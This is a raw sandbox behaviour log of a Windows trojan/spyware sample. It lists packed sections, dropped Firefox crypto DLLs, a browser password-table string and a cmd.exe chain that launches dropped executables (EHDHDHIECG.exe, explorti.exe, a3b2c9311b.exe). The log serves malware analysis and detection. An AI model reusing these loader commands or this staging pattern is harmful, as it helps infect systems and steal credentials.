Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C362E4E 0_2_6C362E4E
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C374EA0 0_2_6C374EA0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C335E90 0_2_6C335E90
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37E680 0_2_6C37E680
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31BEF0 0_2_6C31BEF0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32FEF0 0_2_6C32FEF0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3876E3 0_2_6C3876E3
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C357710 0_2_6C357710
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C329F00 0_2_6C329F00
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3677A0 0_2_6C3677A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C346FF0 0_2_6C346FF0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31DFE0 0_2_6C31DFE0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C35B820 0_2_6C35B820
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C364820 0_2_6C364820
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C327810 0_2_6C327810
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C35F070 0_2_6C35F070
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C338850 0_2_6C338850
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C33D850 0_2_6C33D850
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3460A0 0_2_6C3460A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C33C0E0 0_2_6C33C0E0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3558E0 0_2_6C3558E0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3850C7 0_2_6C3850C7
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C36B970 0_2_6C36B970
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C38B170 0_2_6C38B170
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32D960 0_2_6C32D960
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C33A940 0_2_6C33A940
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C34D9B0 0_2_6C34D9B0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31C9A0 0_2_6C31C9A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C355190 0_2_6C355190
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C372990 0_2_6C372990
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C359A60 0_2_6C359A60
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32CAB0 0_2_6C32CAB0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C382AB0 0_2_6C382AB0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3122A0 0_2_6C3122A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C344AA0 0_2_6C344AA0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C38BA90 0_2_6C38BA90
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C331AF0 0_2_6C331AF0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C35E2F0 0_2_6C35E2F0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C358AC0 0_2_6C358AC0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C35D320 0_2_6C35D320
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C32C370 0_2_6C32C370
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C315340 0_2_6C315340
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31F380 0_2_6C31F380
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3853C8 0_2_6C3853C8
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004AE410 13_2_004AE410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E3048 13_2_004E3048
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004A4CD0 13_2_004A4CD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004D7D63 13_2_004D7D63
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E763B 13_2_004E763B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004A4AD0 13_2_004A4AD0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E6EE9 13_2_004E6EE9
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E775B 13_2_004E775B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E8700 13_2_004E8700
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004E2BB0 13_2_004E2BB0
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE0000 14_2_7EAE0000
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Code function: 14_2_7EAE097C 14_2_7EAE097C
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: String function: 6C34CBE8 appears 134 times
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: String function: 6C3594D0 appears 90 times
Source: ukuWaeRgPR.exe, 00000000.00000002.2212483883.000000006C595000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs ukuWaeRgPR.exe
Source: ukuWaeRgPR.exe, 00000000.00000002.2211421898.000000006C3A2000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs ukuWaeRgPR.exe
Source: ukuWaeRgPR.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ukuWaeRgPR.exe Static PE information: Section: ZLIB complexity 0.9995236280487805
Source: ukuWaeRgPR.exe Static PE information: Section: ZLIB complexity 0.99365234375
Source: ukuWaeRgPR.exe Static PE information: Section: ZLIB complexity 0.989501953125
Source: amadka[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9976413080601093
Source: amadka[1].exe.0.dr Static PE information: Section: avjczlwa ZLIB complexity 0.994752918753683
Source: EHDHDHIECG.exe.0.dr Static PE information: Section: ZLIB complexity 0.9976413080601093
Source: EHDHDHIECG.exe.0.dr Static PE information: Section: avjczlwa ZLIB complexity 0.994752918753683
Source: explorti.exe.6.dr Static PE information: Section: ZLIB complexity 0.9976413080601093
Source: explorti.exe.6.dr Static PE information: Section: avjczlwa ZLIB complexity 0.994752918753683
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.9995236280487805
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.99365234375
Source: random[1].exe.13.dr Static PE information: Section: ZLIB complexity 0.989501953125
Source: a3b2c9311b.exe.13.dr Static PE information: Section: ZLIB complexity 0.9995236280487805
Source: a3b2c9311b.exe.13.dr Static PE information: Section: ZLIB complexity 0.99365234375
Source: a3b2c9311b.exe.13.dr Static PE information: Section: ZLIB complexity 0.989501953125
Source: explorti.exe.6.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: EHDHDHIECG.exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: amadka[1].exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/30@0/3
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C377030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C377030
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2892:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File created: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: ukuWaeRgPR.exe, 00000000.00000002.2212370303.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: ukuWaeRgPR.exe, 00000000.00000003.2051162529.0000000023761000.00000004.00000020.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000003.2030774820.0000000002073000.00000004.00000020.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000003.2051531924.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, IIJKJDAFHJDHIEBGCFID.0.dr, DBAEGCGCGIEGDHIDHJJE.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: ukuWaeRgPR.exe, 00000000.00000002.2209957135.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: ukuWaeRgPR.exe ReversingLabs: Detection: 47%
Source: EHDHDHIECG.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe File read: C:\Users\user\Desktop\ukuWaeRgPR.exe
Source: unknown Process created: C:\Users\user\Desktop\ukuWaeRgPR.exe "C:\Users\user\Desktop\ukuWaeRgPR.exe"
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGCGHCBKFC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe"
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe "C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe"
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe"
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EGCGHCBKFC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe "C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe"
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe "C:\Users\user\AppData\Local\Temp\1000006001\a3b2c9311b.exe"
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe Section loaded: coremessaging.dll
